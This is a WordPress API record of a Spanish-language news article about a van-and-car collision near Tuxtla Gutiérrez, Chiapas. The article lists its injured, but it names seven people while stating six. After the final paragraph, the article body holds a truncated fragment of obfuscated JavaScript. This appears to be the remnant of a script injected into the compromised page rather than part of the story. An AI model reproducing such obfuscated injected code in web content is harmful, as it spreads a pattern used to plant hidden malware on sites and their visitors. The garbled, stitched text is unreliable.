{"id":8316,"date":"2023-01-26T04:35:05","date_gmt":"2023-01-26T04:35:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8316"},"modified":"2023-01-26T04:35:05","modified_gmt":"2023-01-26T04:35:05","slug":"choque-entre-particular-y-unidad-de-transporte-foraneo-deja-seis-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8316","title":{"rendered":"Choque entre particular y unidad de transporte for\u00e1neo deja seis heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674707664059.jpg\" alt=\"\" class=\"wp-image-8317\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674707664059.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674707664059-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte choque entre una unidad de transporte for\u00e1neo y una unidad particular ocurrido este mi\u00e9rcoles en el tramo Tuxtla-La Angostura, dej\u00f3 un saldo de seis heridos.<\/p>\n\n\n\n<p>Los reportes oficiales, informaron que, los involucrados fueron una unidad Urvan Nissan de la ruta Tuxtla-Comit\u00e1n que circulaba de Poniente a Oriente cuando se estrell\u00f3 contra el carro compacto.<\/p>\n\n\n\n<p>Por el golpe sali\u00f3 proyectada contra unas columnas de concreto de una vivienda y los pasajeros expulsados de sus asientos.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal para atender a Manuel de 75 a\u00f1os, Brenda de 30 a\u00f1os de edad, Esperanza de 42 a\u00f1os, Eufocio de 85 a\u00f1os de edad, Rubiel de 20 a\u00f1os de edad, Dami\u00e1n de 17 a\u00f1os de edad, y Martha de 53 a\u00f1os de edad.<\/p>\n\n\n\n<p>Todos los heridos fueron trasladados al G\u00f3mez Maza, para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Personal de la Guardia Nacional, tom\u00f3 conocimiento del hecho y pusieron a disposici\u00f3n de las unidades involucradas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte choque entre una unidad de transporte for\u00e1neo y una unidad particular ocurrido este mi\u00e9rcoles en el tramo Tuxtla-La Angostura, dej\u00f3 un saldo de seis heridos. Los reportes oficiales, informaron que, los involucrados fueron una unidad Urvan Nissan de la ruta Tuxtla-Comit\u00e1n que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8317,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8316","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8316"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8316\/revisions"}],"predecessor-version":[{"id":8318,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8316\/revisions\/8318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8317"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}